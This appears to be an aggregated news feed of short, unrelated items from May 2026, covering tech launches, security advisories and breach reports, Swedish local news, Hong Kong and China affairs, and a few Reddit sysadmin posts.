On Tuesday, Google showed off Googlebook, a new series of laptops intended to eventually replace Chromebook. Googlebook uses Google's new operating system, which is a kind of combination of Android and Chrome OS. Among other things, this means it will be possible to run millions of mobile apps as they are. Otherwise, the big draw is Gemini Intelligence, Google's collection of AI tools meant to help us with more or less everything we want to do with our computers. Because Gemini has full awareness of what is shown on the screen, the AI tool can suggest suitable actions for your files or collect data from your apps. To start Gemini, it is enough to shake the mouse pointer, a feature called Magic Pointer. Just as with Chromebook, there will be Googlebook models from Google's partners, which include Acer, Asus, Dell, HP and Lenovo. The first computers will go on sale this autumn, Ars Technica reports.
A cyberattack campaign that tricks users into running malicious commands on their own computers has taken a dangerous new turn. The technique, known as “ClickFix,” has been circulating for some time, but a recent incident revealed that attackers are now pairing it with a 10-year-old open-source Python tool to create a far more resilient form […] The post ClickFix Evolves with 10-Year-Old Open-Source Python SOCKS5 Proxy appeared first on Cyber Security News.
Open original transmissionEn av nyheterna i Android 17 är Pause Point, en ny funktion som gör det möjligt att få en automatisk paus på tio sekunder när du öppnar beroendeframkallande appar som Tiktok, Instagram eller Youtube. Syftet med Pause Point är att minska risken för att användarna fastnar framför sina skärmar, ett fenomen som kallas för ”doomscrolling”. Under den tio sekunder långa pausen kan du nämligen bestämma dig för att göra något annat med mobilen, till exempel läsa en e-bok eller lyssna på en ljudbok. Alternativt kan du förstås välja att strunta i mobilen och ta en skogspromenad eller träffa kompisar. För att stänga av Pause Point behöver du starta om mobilen, vilket ska se till att du tänker dig för innan du avaktiverar funktionen.
Recently, American, German and Dutch authorities have warned of a wave of fake support messages in the Signal app. In reality these are phishing campaigns in which the perpetrators are out to get their hands on our accounts, chats and contacts, Bleeping Computer reports. Signal has now chosen to add clear warnings in the app urging users never to reply to messages that claim to come from the support department. When someone tries to contact you, it will also say "Name not verified" or "No groups in common" if it is an unknown person. It is also emphasized that Signal never asks for registration codes, PIN codes or recovery keys, so all such requests should be regarded as attempted scams.
The UK’s AI Security Institute evaluated GPT-5.5’s ability to find security vulnerabilities, and found that it is comparable to Claude Mythos. Note that the OpenAI model is generally available. Here is the Institute’s evaluation of Mythos. And here is an analysis of a smaller, cheaper model. It requires more scaffolding from the prompter, but it is also just as good.
Article URL: https://atalaykutlay.com/or-tools-cp-sat-for-scheduling-problems.html Comments URL: https://news.ycombinator.com/item?id=48120351 Points: 60 # Comments: 22
Intel on Tuesday released a new version of their open-source Compute Runtime for OpenCL and Level Zero support across their integrated and discrete graphics hardware...
Ancient Slashdot reader ewhac writes: CERN, a longtime Open Source pioneer, has made several contributions over the years to KiCad ("KEE-kad"), an Open Source EDA (Electronic Design Automation) package widely used in the hobbyist and professional electronics communities. It's gotten so widely used that users can now submit their KiCad design files directly to several electronics fabricators (rather than the traditional step of converting the layouts to Gerber files). Over the years, CERN has also developed their own symbol and footprint libraries to support their own internal electronic designs. Last week, CERN released those KiCad component libraries, containing over 17,000 symbols, under the CERN Open Hardware License. Read more of this story at Slashdot.
The Commission wants travelling by train to become as easy as flying. Train passengers should be able to book package trips with several different companies, instead of piecing together their own journey as they do today. Passengers' refund protection is to be strengthened for delayed or cancelled departures. The proposal is now being sent to the Parliament and the EU countries, which must reach agreement. Andreas Liljeheden, Sveriges Radio's Brussels correspondent, believes it will be a drawn-out process.
Action on Salt & Sugar said people should not be exposed to a "hidden health risk every time they buy lunch".
When a 12-year-old girl and a 17-year-old boy try to detonate hand grenades in Borås in the autumn of 2025, they do so on behalf of one and the same Foxtrot leader, Ali Namdar. "Through social media and encrypted chats, it is not that hard to recruit young people," says Joakim Hellström, community police officer in Borås.
Hello, I'm new to Enterprise Apps management. I would like to know the main difference between the SAML-based sign-on certificate (found under Enterprise Applications) and the certificate found under App Registrations. Thanks! submitted by /u/ibteea
The summit in Beijing has high stakes, but hopes of a breakthrough in the long-running tensions between China and the US are small. There is, however, some hope that China can give the US enough support to help ease the crisis in the Middle East.
After the renovation: Asian fusion has now opened its doors Alingsås Tidning
As the early summer season approaches after weeks of heavy rain, reports of “flying ants” have emerged across Hong Kong, sparking concerns that the insects could cause a nuisance and even damage homes. Social media users also shared photos of the insects circling street lights in the evening or of their carcasses scattered across toilet sinks, with some questioning whether they are in fact termites. The South China Morning Post looks into these flying insects and how to prevent termites from...
The actor was recognised for his contributions to entertainment as well as his humanitarian efforts.
The sea squirt known as havsspyan ("sea vomit") is spreading across the seabed. To stop the spread, the Swedish Transport Agency is now demanding measures against the invasive species, measures that affect boat owners.
In the hours before Donald Trump’s arrival in Beijing to begin his state visit, an unexpected detail caught the internet’s attention: US Secretary of State Marco Rubio’s choice of travel attire. Instead of the tailored formalwear typically expected of a top diplomat, Rubio appeared in a grey Nike tracksuit on the Beijing-bound Air Force One – an ensemble social media users quickly recognised as the “Maduro arrest look”. White House communications director Steven Cheung posted a photo of the top...
Tesla China has launched a new financing scheme to attract more budget-conscious buyers after its sales in the world’s largest electric vehicle (EV) market fell behind its domestic rivals. The US carmaker said on Wednesday that the down payment for a Shanghai-made Model 3 vehicle – priced at 235,500 yuan (US$34,672) – would be slashed to 55,900 yuan from 79,900 yuan if the buyer chose a five-year car loan offered by Tesla. “Our strong products, combined with attractive incentives for car...
Blog post mourning decline appears to have helped knock what was left of the veteran app's online presence offline
Facing scrutiny and persistent questions over its track record in artificial intelligence, Tencent Holdings’ co-founder and CEO Pony Ma Huateng offered this candid assessment to shareholders on Wednesday: “A year ago we thought we were on the boat, then we found it was leaking.” Speaking at the firm’s annual general meeting at the Four Seasons Hotel in Hong Kong, Ma signalled the beginnings of a turnaround, saying that the company had finally found its footing but was “not yet seated”, according...
Microsoft on Tuesday released patches for 138 security vulnerabilities spanning its product portfolio, although none of them have been listed as publicly known or under active attack. Of the 138 flaws, 30 are rated Critical, 104 are rated Important, three are rated Moderate, and one is rated Low in severity. As many as 61 vulnerabilities are classified as privilege escalation bugs, followed by
CVE-2026-40361 is similar to a vulnerability found a decade ago, BadWinmail, which at the time was dubbed an “enterprise killer”. The post Microsoft Patches Critical Zero-Click Outlook Vulnerability Threatening Enterprises appeared first on SecurityWeek.
Hi guys, our CEO's Outlook app keeps crashing and I don't know what more to do. This is the situation: he has a Surface, and uses Teams as well as Outlook as desktop app. Teams doesn't crash. His Outlook crashes on the office Wi-Fi, as well as when he is at home. He wants to use Outlook as the desktop app and didn't want to use the desktop version as alternative. The app has been freezing multiple times a day for about 2 weeks now. The only way to close it is via Task Manager. No new emails load when it happens. Restarting the PC doesn't help. Here's everything I've tried so far: Safe Mode (outlook.exe /safe) – same issue, so no Add-In problem; Deleted and rebuilt the .ost file – didn't help; Online Repair via Settings → Apps → Outlook → Advanced options → Repair – no change; Checked Windows & Office Updates – all up to date; Fully uninstalled Office with Microsoft's SaRA tool and reinstalled fresh – still freezing; Checked disk usage in Task Manager – nothing critical; Checked free space on C: – enough available; Checked RAM usage – looks fine; Checked Event Viewer – looks fine; Antivirus exclusion for Outlook – tested, no improvement; Checked Exchange connection – appears stable. System is running Microsoft 365 on Windows. Anyone have any ideas what else could cause this? Could it be hardware related? Thanks in advance! submitted by /u/Bubbly-Conference745
Budget carrier HK Express will cut its fuel surcharge on flights departing Hong Kong to overseas destinations by 12.8 per cent from May 16, reducing the fee by HK$50 (US$6.38) to HK$339 per leg, the airline has said. The reduction, revealed on its website on Wednesday, excludes mainland China routes, and follows lower fuel prices amid the Middle East war. The budget carrier of Hong Kong’s Cathay Pacific Airways also said the surcharge for inbound medium-haul journeys, such as those departing...
A critical security flaw has been found in SandboxJS, a widely used JavaScript sandboxing library available on npm. The vulnerability allows attackers to break out of the sandbox entirely and run any code they want directly on the host system. Tracked as CVE-2026-43898, it carries a maximum severity score of 10.0, which is as serious […] The post Critical SandboxJS Escape Vulnerability Enables Host Takeover appeared first on Cyber Security News.
Some European companies operating in China are shifting more production to the country as part of broader supply chain adjustments in response to the US-Israeli war on Iran, according to a new survey by the EU Chamber of Commerce in China. The flash survey of European companies found that more than a quarter of firms had adjusted their supply chain strategies in China following the Middle East conflict, as higher energy and logistics costs weigh on operations. Six in 10 chemicals and petroleum...
10 degrees and overcast in Alingsås during the afternoon Alingsås Tidning
In the US, fired and laid-off workers often have their digital credentials deactivated before they learn about the loss of their jobs; indeed, the inability to log in to a corporate system may be the first an employee knows of the situation. Although not a generous or humane approach to staff reduction, it does follow from the simple fact that a fired employee with access to company systems is a security risk. Just ask the Akhter twin brothers, accused of wiping out 96 databases hosting US government information in the minutes after both were fired last year from their shared employer. https://arstechnica.com/tech-policy/2026/05/drop-database-what-not-to-do-after-losing-an-it-job/ submitted by /u/Flying-T
Apple supplier Foxconn has confirmed a cyberattack on several of its U.S. factories, after a ransomware group claimed to have stolen confidential Apple project files as part of the hack. The Nitrogen group posted the breach on its data leak site this week, claiming to have made off with 8TB of data spanning more than 11 million files. Alongside the allegedly stolen Apple files, Nitrogen claims the trove includes internal project documentation and technical drawings tied to Intel, Google, Dell, and Nvidia. Foxconn confirmed the intrusion to The Register on Tuesday, but the supplier did not respond to questions regarding whether any customer data was actually taken. A company spokesperson said its cybersecurity team activated response measures to keep production running, and that all of its affected factories are resuming normal operations. Foxconn assembles a wide range of Apple products, but Apple famously takes the secrecy of unreleased products extremely seriously, and suppliers typically receive only the technical information needed for their specific role in manufacturing. Nitrogen is believed to be an offshoot of leaked Russia-based Conti 2 ransomware code. If so, though, the stolen files may be inaccessible. Researchers at Coveware warned in February that a bug in the group's ESXi encryptor makes file recovery impossible, even for victims who pay up. It's not the first time Foxconn has been targeted by ransomware gangs. The manufacturer was previously hit by LockBit in 2022 and 2024. This article, "Apple Project Files Allegedly Stolen in Foxconn Ransomware Attack" first appeared on MacRumors.com
Discord, the popular instant messaging and VoIP communication platform, announced some significant improvements being made to their Linux client...
There is only a little over a month left until Midsummer, and the country's strawberry growers are currently fighting to get the berries ready in time. In many places spring is late, and there have been cold nights. "If you are not on hand with the fleece cover on a frosty night, things go wrong," says Bitte Wilsson, who runs a farm in Axlarp outside Nässjö.
In addition to FreeBSD 15.1 releasing in the coming weeks, NetBSD 11.0 is also just around the corner as another prominent and major BSD update. NetBSD 11.0-RC4 is now available for last minute testing with this hoping to be the final release candidate...
Lundsberg's head of marketing Christopher Johrin promised zero tolerance for racism and hazing when the entrepreneur and media personality Gunilla von Platen and her husband were considering the school for their son. Two and a half years later he backed away from his words.
Because of the global energy crisis, the government is proposing an extra amending budget of 17.5 billion kronor. Among other things, there will be lower tax on petrol and diesel from 1 July until the end of November if the EU's Council of Ministers gives the go-ahead. Support is also directed to public transport. The Tidö parties have considered support for agriculture and aviation, but nothing of the kind was presented on Wednesday.
Malaysia said on Wednesday it was weighing legal action after Norway blocked the export of missiles ordered for its navy, in a last-minute decision that has dealt a fresh blow to one of the country’s most troubled defence projects. The row centres on the Naval Strike Missile, ordered from Kongsberg Defence and Aerospace for Malaysia’s long-delayed littoral combat ship programme. Government spokesman Fahmi Fadzil said Prime Minister Anwar Ibrahim had raised the matter with his Norwegian...
Depleted US weapons stockpiles as a result of its war in Iran risk eroding Donald Trump’s bargaining power when he meets Xi Jinping in China this week. With Trump on the high-stakes trip is Defence Secretary Pete Hegseth, marking the first time a Pentagon chief has accompanied a president to Beijing in decades. The weapons shortages not only raise questions about US preparedness for war in the Indo-Pacific, but may give Beijing extra leverage because of its control of the supply of critical...
Indonesia, already leading Southeast Asia’s push to keep children off risky digital platforms with an under-16 social media ban, now wants to extend those protections to e-commerce after officials said young people had become victims of online scams and unsupervised digital spending. The plan has drawn support from child psychologists, who warn of impulsive consumption among young users. However, it also presents e-commerce companies with a difficult compliance test: building age-verification...
"I do think it's a really good historical moment for the space industry."
For most people, drinking water is an unremarkable daily habit. In ancient China, however, it carried far greater meaning. Water was bound up with social rank, health beliefs, ritual practice and etiquette. As early as the pre-Qin period (Paleolithic Period – 221 BC), Chinese thinkers were already classifying natural water. The ancient encyclopedic text Master Lü’s Spring and Autumn Annals claimed that “heavy water”, rich in minerals, could cause swelling in the legs and feet, while “light...
Chromium extension swaps promos for John Carpenter-style subliminal slogans
The acclaimed Tudor-set play is co-produced by the Barbie actor, and focuses on working-class women in Essex during the downfall of Anne Boleyn.
Hong Kong’s labour minister has dismissed calls to review the city’s immigration scheme for non-local graduates or tighten talent scheme requirements, despite a sharp decline in entry-level roles, arguing that the workforce is shrinking and the number of local degree holders is insufficient to meet demand. Secretary for Labour and Welfare Chris Sun Yuk-han also said the Employees Retraining Board, which will be rebranded as “Upskill Hong Kong” later this year, could adopt a new focus to help...
KDE today announced a significant investment into the project by Germany's Sovereign Tech Fund. KDE will be receiving €1,285,200 EUR (or roughly 1.5 million USD) over the years 2026 and 2027 to make some significant improvements into their software stack...
Successful exploitation of these flaws could lead to arbitrary code execution and information disclosure. The post Fortinet, Ivanti Patch Critical Vulnerabilities appeared first on SecurityWeek.
The band behind Finland's only Eurovision victory to date made a strong impression on the then nine-year-old André Schultzberg. Soon the tribute band Mini-Lordi, with pupils from the Sweden-Finnish language school in Örebro, was a reality. Now, 20 years later, Eurovision is still a big part of his life.
A new core infrastructure improvement for the Linux kernel on ARM being worked on is enabling 128-bit page table entries (PTEs) with FEAT_D128 as a new optional feature of Armv9.3 and later...
Henderson Land Development secured the first biodiversity loan in Hong Kong, receiving around HK$100 million (US$12.8 million) from HSBC and Hang Seng Bank for green initiatives at Central Yards, the company’s flagship mixed-use development on the New Central Harbourfront. This loan would provide a “scalable blueprint” for companies to achieve their sustainability goals and enhance Hong Kong’s position as a leading international sustainable finance centre, according to the two banks. The...
"How is your family doing? Remember that I can only help them if you cooperate," reads a text message received by a Ukrainian man in southern Norway. The Norwegian Police Security Service, PST, wants to raise awareness of the phenomenon. They believe Russia may have an interest in carrying out sabotage against logistics infrastructure linked to the support for Ukraine. Since 2022, around 83,000 Ukrainians have come to Norway, of whom roughly 22,000 are from areas occupied by Russia. They are particularly exposed to pressure, since they may have family still there.
CEO says there is 'no confusion at all' after cloud-only innovation plan drew flak
Gwanghwamun Square, a plaza in Seoul framed by royal palaces and monuments to Korean national identity, is at the centre of a dispute over whether a massive new Korean war memorial belongs in a public space seen as a major tourist attraction and long associated with civic gatherings and pro-democracy protests. A row of 23 stone monuments representing South Korea and the 22 foreign countries that fought alongside it during the 1950-53 war was recently unveiled at the square. Located across from...
202-square-metre house in Alingsås sold Alingsås Tidning
For years, texting between an iPhone and an Android phone meant your messages traveled without any real privacy protection. That long-standing gap is now being addressed, as Apple and Google have jointly launched a beta rollout of end-to-end encrypted messaging over Rich Communication Services, better known as RCS. Starting May 11, 2026, this milestone update […] The post iOS 26.5 Brings End-to-end Encrypted RCS Messaging Between iPhone and Android appeared first on Cyber Security News.
A 10-year-old girl has told a Hong Kong court that a domestic helper inappropriately touched her when waking her up one morning. Standing trial at Kowloon City Court on Wednesday, helper Lady Jay Santos Flores denied four counts of indecent assault for allegedly molesting the daughters of her former employer in the family’s home between May and June last year. The younger daughter, who was not named in court and testified via video conference, said the 45-year-old helper came to her room on the...
House in Nossebro gets new owners, price tag: 1,150,000 kronor Alingsås Tidning
The tree that inspired Astrid Lindgren to create Pippi Longstocking's lemonade tree has now been vaccinated against Dutch elm disease. "We hope the tree does not fall ill," says arborist Gabriel Watson.
Senior officials from China and the United States concluded their latest round of trade talks in Seoul after less than four hours on Wednesday, the briefest session since the two countries began holding talks last year. The seventh round of negotiations – led by Chinese Vice-Premier He Lifeng and US Treasury Secretary Scott Bessent – wrapped up just hours ahead of US President Donald Trump’s scheduled arrival in Beijing. The officials ended the session without speaking to the media, a departure...
Taiwan staged a large-scale live-fire drill on a frontline island near mainland China on Wednesday, hours before President Donald Trump was due to land in Beijing for high-stakes talks with Chinese leader Xi Jinping. The exercise on Kinmen, also known as Quemoy, simulated a People’s Liberation Army amphibious assault on the coastline. The coming Xi-Trump summit has triggered renewed anxiety in Taiwan that it could become a bargaining chip in their broader negotiations, after Trump indicated that...
US President Donald Trump said he would urge China’s Xi Jinping to “open up” to American business, and belatedly added Nvidia’s Jensen Huang to the list of executives accompanying him on a trip to Beijing. “I will be asking President Xi, a Leader of extraordinary distinction, to ‘open up’ China so that these brilliant people can work their magic,” Trump said on social media. “I will make that my very first request.” Huang boarded Air Force One during a refuelling stop in Alaska on Wednesday,...
Umeå municipality has activated crisis staff mode in elderly care because of staff shortages. In a message sent to staff, the municipality writes that the service is under heavy strain.
The neck rings were found at an archaeological excavation in Marby, outside Norrköping. The find is described as "unique" and may be an important piece of the puzzle for gaining a greater understanding of the Bronze Age.
Article URL: https://vittorioromeo.com/index/blog/refl_enum_to_string.html Comments URL: https://news.ycombinator.com/item?id=48119326 Points: 51 # Comments: 54
Ahead of US President Donald Trump’s state visit, China’s state-controlled media has framed the summit with President Xi Jinping as an opportunity to steer relations towards greater stability and mutual respect, despite grievances and tensions. Xie Feng, China’s ambassador to the US, echoed that message in a wide-ranging Newsweek interview published on the eve of the visit, voicing hope the Beijing meetings would help to manage differences and broaden cooperation along a “steady, sound and...
The two chip giants have published over two dozen advisories describing recently identified security defects. The post Chipmaker Patch Tuesday: Intel and AMD Patch 70 Vulnerabilities appeared first on SecurityWeek.
Leveraging 10G PON, light OTN, and Wi-Fi 7 to modernize infrastructure and reduce operational costs for local operators
The G7 economists’ memo from March and the IMF’s April report on global imbalances arrived at the same prescription: China’s current account surplus is excessive and should be cut by boosting consumption. The diagnosis is wrong. The world economy, especially emerging markets and developing economies, benefits from China’s high saving. A current account surplus is the excess of national saving over domestic investment. The saving is not lost; it is exported abroad in the form of net capital...
Union demands government strips outsourcer of contract after delays, bereavement failures, and data breach
A serious security flaw has been found in Exim, one of the most widely deployed mail transfer agents on the internet today. The vulnerability, tracked as EXIM-Security-2026-05-01.1, allows a remote attacker to corrupt server memory and potentially execute malicious code without needing any special privileges or credentials. It was publicly disclosed on May 12, 2026, […] The post New Exim BDAT GnuTLS Vulnerability Enables Code Execution Attacks appeared first on Cyber Security News.
Empowering operators to move beyond basic connectivity with next-gen AI and ODN systems
The foreign minister says the "distressed" Ghanaians registered with the embassy in Pretoria to be evacuated.
Hong Kong police have arrested a 70-year-old taxi driver after he lost control of his cab and drove onto a pavement in Ngau Tau Kok, killing a woman and badly injuring another. A police spokesman said on Wednesday evening that the driver was arrested for dangerous driving causing death and detained for inquiry. The force earlier said the cabbie and his two passengers were also hurt when the taxi veered onto the pedestrian walkway at about 1.50pm that day on Choi Ha Road, near Chun Wah Road,...
Cybersecurity researchers are calling attention to a new campaign dubbed GemStuffer that has targeted the RubyGems repository with more than 150 gems that use the registry as a data exfiltration channel rather than for malware distribution. "The packages do not appear designed for mass developer compromise," Socket said. "Many have little or no download activity, and the payloads are repetitive,
Despite extreme pressure, the UK's Prime Minister Keir Starmer has not resigned. On Wednesday a meeting took place with health minister Wes Streeting, who has been singled out as his challenger. A few hours after the meeting came reports that Streeting is preparing to resign, according to The Times, in order to be able to formally challenge Starmer.
Android smartphones have become the go-to device for billions of people around the world. From banking and messaging to storing personal photos and sensitive documents, people rely on them for almost everything. That reliance has made mobile devices a prime target for scammers, cybercriminals, and threat actors who constantly evolve their tactics to slip past […] The post Google Enhances Android Mobile Security with New AI-Powered Protections appeared first on Cyber Security News.
A large search operation is under way in Valdemarsvik for a man who has been missing since early Tuesday evening. Police, the Home Guard and the sea rescue service are taking part in the search. No crime is suspected.
Empowering Brazilian ISPs with next-gen Wi-Fi 7 infrastructure
British Prime Minister Keir Starmer is under pressure to resign after more than 80 lawmakers in his Labour Party said he was not the right person to lead the country and win the next national election. He has vowed to stay on as no formal leadership challenge has yet been triggered. If Labour were to choose a new leader, here is a list of those in the frame to replace Starmer: Wes Streeting, 43 Streeting has served as health and social care minister since Labour came to power in July 2024 – a...
More than 500 packages were pushed during the attack, but the target appears to have been RubyGems itself rather than users. The post Hundreds of Malicious Packages Force RubyGems to Suspend Registrations appeared first on SecurityWeek.
We have put together stories from our coverage on electric and new energy vehicles from the past two weeks to help you stay informed. If you would like to see more of our reporting, please consider subscribing. 1. From Beijing to Berlin: Chinese EVs turn heads as brands eye European markets For German consumer Erik Böhme, a first visit to the Beijing auto show was an eye-opener – the world’s largest car exhibition showcased a vast array of electric vehicle (EV) brands, many already gaining...
That's fine when playing poker, but less useful when we trust LLMs with serious work like finding software flaws
167-square-metre house in Nossebro sold for 1,150,000 kronor Alingsås Tidning
For decades, the arrival of summer in South Korea was heralded by the rhythmic hum of cicadas and the predictable onset of monsoon season. But as climate change rewrites the country’s seasonal script, the government is bracing for a new reality. On Wednesday, the Korea Meteorological Administration announced a sweeping overhaul of its national weather warning system, the first major restructuring in nearly two decades. The centrepiece of the plan is the introduction of a top-tier “extreme heat...
A major rescue operation took place off Åstön in Timrå municipality after a boating accident in which two people ended up in the water. Shortly after 9 o'clock both people had been rescued. "It has gone well, the two people have now been picked up," sea rescue coordinator Daniel Åström told SVT.
Hong Kong customs officers have arrested three people in a months-long operation against a money laundering and illicit goods syndicate that led to the discovery of about 2.2 million untaxed cigarettes and HK$11.3 million (US$1.4 million) in alleged criminal proceeds. The Customs and Excise Department said on Wednesday that officers raided five residential flats a day earlier, arresting two men, aged 31 and 37, and a 35-year-old woman on suspicion of money laundering. The department said an...
Article URL: https://sockpuppet.org/blog/2026/05/12/emacsification/ Comments URL: https://news.ycombinator.com/item?id=48118727 Points: 50 # Comments: 6
Smaller house in Sollebrunn gets new owners, price tag: 2,500,000 kronor Alingsås Tidning
Microsoft pushed out a significant cumulative update for Windows 11 on May 12, 2026, covering both version 25H2 and version 24H2. The update, identified as KB5089549, brings OS Builds 26200.8457 and 26100.8457 to users running these versions. It bundles the latest security fixes alongside quality improvements carried over from April’s optional preview release, making it […] The post Microsoft Releases Cumulative Update for Windows 11, Version 25H2 and 24H2 appeared first on Cyber Security News.
A further two Swedes have been placed on a "most wanted" list within the Europol operation Grimm, Expressen reports.
The FBI and Chinese police have taken part in a joint operation targeting scam networks in Dubai, in a rare show of cooperation ahead of US President Donald Trump’s visit to China. Dubai Police – which led the operation dubbed Tri-Force Sentinel – said at least nine scam hubs were dismantled and 276 suspects arrested, most of them from Southeast Asia. “The operation delivered a decisive strike against three criminal syndicates and dismantled nine fraud centres behind high-yield investment scams...
fjo3 shares a report from Phys.org: Ever felt like mosquitoes bite you while ignoring everyone else? Scientists are now making progress in deciphering the complex chemical cocktail that makes particular people more enticing to these disease-spreading bloodsuckers. "It's not a misconception -- mosquitoes are attracted to some people more than others," Frederic Simard of France's Institute of Research for Development told AFP. "But we are not all magnets all the time," the medical entomologist added. A range of sensory cues can cause mosquitoes to pick one human over another -- mainly the smell and heat our bodies give off, and the carbon dioxide we exhale. Female mosquitoes -- which are the only ones that bite -- detect these signals with finely tuned receptors, then choose their target accordingly. "We have known for over 100 years that mosquitoes are attracted by the carbon dioxide that we exhale -- this is the first signal that triggers their behavior" when they are dozens of meters away, Swedish scientist Rickard Ignell told AFP. Within around 10 meters, "mosquitoes will start detecting our odor, and in combination with carbon dioxide," this attracts them even more, said the senior author of a recent study on the subject. As they get closer, body temperature and humidity make particular humans even more enticing. [...] For Ignell's recent study, the researchers released Aedes aegypti mosquitoes -- known for spreading yellow fever and dengue -- on 42 women in a lab, to see which ones they preferred. "We have shown that mosquitoes use a blend of odorous compounds (we identified 27 that the mosquitoes will detect, out of the possible 1,000) for their attraction to us," Ignell said. The woman the mosquitoes most liked to bite -- which included pregnant women in their second trimester -- produced a large amount of a particular compound made by a breakdown of the skin oil sebum.
That even a small increase of this compound -- called "1-octen-3-ol", or mushroom alcohol -- made a difference came as a surprise, Ignell emphasized. Read more of this story at Slashdot.
Capercaillies near the construction site of the power line to SSAB Oxelösund are causing a delay to the giant project. An appeal to a court halts the project indefinitely.
Altivio AB – new company starts in Alingsås Alingsås Tidning
42-year-old starts new hotel business in Alingsås Alingsås Tidning
Google on Tuesday unveiled a new opt-in Android feature called Intrusion Logging for storing forensic logs to better analyze sophisticated spyware attacks. Intrusion Logging, available as part of Advanced Protection Mode, enables "persistent and privacy-preserving forensics logging to allow for investigation of devices in the event of a suspected compromise," the company said. The feature, it
21-year-old starts new construction company in Herrljunga Alingsås Tidning
35-year-old starts new construction company in Alingsås Alingsås Tidning
Singapore will be directly hit by weakened principles in international sea laws as the city state depends on open and secure waterways to maintain its status as a trade hub, Prime Minister Lawrence Wong has warned. He urged cooperation among like-minded countries to uphold and strengthen the framework of international legislation. “As a trading nation, Singapore depends on open and secure sea lanes. International law, including the law of the sea, ensures that vital waterways remain open to all...
South Korea was reviewing a phased contribution to efforts to ensure safe navigation through the Strait of Hormuz, Defence Minister Ahn Gyu-back said on Wednesday, signalling support steps short of military participation. Ahn told a press conference with South Korean reporters in Washington that he had conveyed Seoul’s position at a meeting with US Secretary of Defence Pete Hegseth on Monday. “We said at about this level that, fundamentally, we will participate as a responsible member of the...
[This is a Guest Diary by Joshua Nikolson, an ISC Intern and part of the SANS.edu Bachelor's degree in Applied Cybersecurity (BACS) program.]
A proposal unveiled by Philippine President Ferdinand Marcos Jnr for a new Southeast Asian maritime centre has raised questions about its most glaring obstacle: Manila’s long-standing South China Sea dispute with Beijing. Analysts warn such a centre would not only have to avoid appearance of being an instrument of Philippine interests in disputed waters, but also risks simply duplicating the work of existing regional bodies. Speaking on Friday at a press conference following the Asean summit in...
Where it’s been well and truly forked, seemingly without Microsoft’s code locker noticing
The government wants to cut the tax on petrol and diesel as part of a crisis package of 17.5 billion. – In the worst global energy crisis ever, we must stand on the side of households, says Energy Minister Ebba Busch (KD). The measure is slammed by the Green Party, but Social Democrat leader Magdalena Andersson says they would have done the same thing.
Inflation fell sharply to 0.8 percent in April according to the CPIF measure, the definitive figures from Statistics Sweden (SCB) show. At the same time, food prices also fell – coffee and dairy products became considerably cheaper.
Bangladesh’s once-praised family planning system is buckling under severe contraceptive shortages, raising fears of a rise in unplanned pregnancies in one of the world’s most densely populated countries. For decades, the South Asian nation was hailed as a success for slashing birth rates through an expansive state-backed family planning programme that sent field workers door to door with pills, condoms and advice on birth spacing. But that system is now faltering, with government clinics across...
China has sent artificial embryos to its space station to study whether humans could reproduce in zero gravity. The experiment was reported on Tuesday by state broadcaster CCTV. Project leader Yu Leqian said the main goal was to study the impact of gravity – and its absence – on early development, in preparation for eventual human settlement off Earth. Once the impact of the force on embryos was understood, scientists could develop interventions to control its effect, he told CCTV. Yu is a...
Two small counties in China have put in place reciprocal arrangements for their residents to visit tourist spots following a moving story involving people in one place buying the apples of a sick farmer from the other. The story began on May 2 when Ji Yaozhong, a farmer from Yangxian county of northwestern Shaanxi province, drove a truck carrying 4,000kg of apples to sell in Xianfeng county in Hubei province, central China, the Hubei Daily reported. He suffered a sudden stroke which left him...
In 2026, data is the undisputed lifeblood of the modern enterprise. As organizations shift completely to decentralized, multi-cloud architectures, the challenge of securing sensitive information—such as Intellectual Property (IP), Personally Identifiable Information (PII), and Protected Health Information (PHI)—has grown exponentially. It is no longer enough to guard the perimeter against external adversaries; organizations must also […] The post Top 10 Best Data Loss Prevention Software in 2026 appeared first on Cyber Security News.
French President Emmanuel Macron is facing backlash after he interrupted a panel at the Africa Forward Summit in Kenya to demand silence from the audience. Macron stormed the stage to rebuke audience members for what he called a “total lack of respect”, accusing them of disrupting speakers during a presentation by artists and young entrepreneurs. He had earlier described himself as a “Pan-Africanist” during a news conference. The summit is meant to showcase France’s new policy for the continent...
An American president is visiting China for the first time in almost a decade. The focus of the talks is expected to be spread across several areas – from the questions of Taiwan and the Strait of Hormuz to three important B's for the US.
A French woman is in critical condition after being infected with hantavirus on the cruise ship Hondius. She is being treated in Paris – and is being helped by an artificial lung, AP reports. A total of eleven cases of the virus have been reported, of which nine are confirmed. Three people have died.
Class A drugs loaded instead of A4
The biggest tech firms are set to sell millions of smart glasses despite growing privacy concerns.
Alex Batty reveals all about his abduction and life on the run in a new BBC documentary.
Anyone else experiencing an increase of engineers (not juniors that can be potentially forgiven) and Tech Executives use AI like ChatGPT/Claude to troubleshoot a problem and then copy the entire AI answer, not even re-written, just copied then mailing the clients with the AI slob. Then the clients reach out for you to make sense of it just to realize that the AI answer has nothing to do with problem and see the engineer that handled the case has a title that includes either "Senior" or "Chief Exec of..." or similar? We're seeing this more and more and not just in the tech field but everywhere people just shamelessly copy and paste entire emails into GPT, generate an answer and paste the reply directly to the clients. submitted by /u/Askey308
IDC estimates that there were more than 28 million AI agents in operation at the end of last year and predicts that there will be more than 1 billion active agents by 2029, performing 217 billion actions per day. It is easy to build a POC for an AI agent, says Venkat Achanta, head of technology, data and analytics at Trans Union, a global credit information company with revenue of 4.6 billion dollars. But governing, securing and scaling it is an entirely different challenge, especially for companies in heavily regulated industries such as financial services and healthcare. To solve the problem, Trans Union has spent the past three years building its agentic AI platform, One Tru. The goal was to create something as reliable and deterministic as the old, script-based expert systems, but as flexible as generative AI and as easy to interact with as a chatbot. The trick, however, was to combine the best of both worlds by using traditional systems for core processes where explainability and reliability are crucial, and adding generative AI functionality in a limited way for the tasks it was particularly suited to. Because the infrastructure for this was not available, Trans Union built its own and set aside 145 million dollars for the project. It was a large investment in an unproven technology, but it has already led to cost savings of 200 million dollars. In addition, Trans Union used the platform to build customer-facing solutions as soon as it was ready. In March this year, for example, Trans Union launched its AI Analytics Orchestrator Agent, built using the One Tru platform and powered by Google's Gemini models. The agent is already used internally by Trans Union to improve analytics and can also be used by customers to run sophisticated data analyses without the need for data scientists.
